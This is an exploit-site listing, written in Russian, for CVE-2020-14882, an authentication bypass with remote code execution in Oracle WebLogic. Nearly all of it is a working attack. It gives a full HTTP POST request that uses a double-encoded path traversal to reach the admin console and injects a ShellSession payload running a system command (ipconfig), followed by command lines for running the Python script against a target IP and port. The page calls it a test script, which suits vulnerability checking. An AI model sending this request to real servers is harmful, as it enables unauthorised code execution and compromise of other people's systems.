Sploitus

Exploit for Weblogic Unauthorized-bypass-RCE

kitploit · 2026-08-26

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LUDY-DEV-WEBLOGIC_UNAUTHORIZED-BYPASS-RCE
# (CVE-2020–14882) Weblogic: неавторизованный обход аутентификации и RCE

(CVE-2020-14882) Тестовый скрипт для проверки неавторизованного обхода аутентификации и RCE в Oracle Weblogic Работает на Python3

# Запрос

root@kitploit:~
    
    
    POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
    Host: <Target IP>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-type: application/x-www-form-urlencoded; charset=utf-8
    Content-Length: 128
    
    _nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
    

Тестовый скрипт проверяет ответные данные с помощью pcre.

# Использование

root@kitploit:~
    
    
    - 7001/tcp (порт WebLogic по умолчанию) 
    Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP>
    
    - конкретный порт/tcp 
    Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP> <port>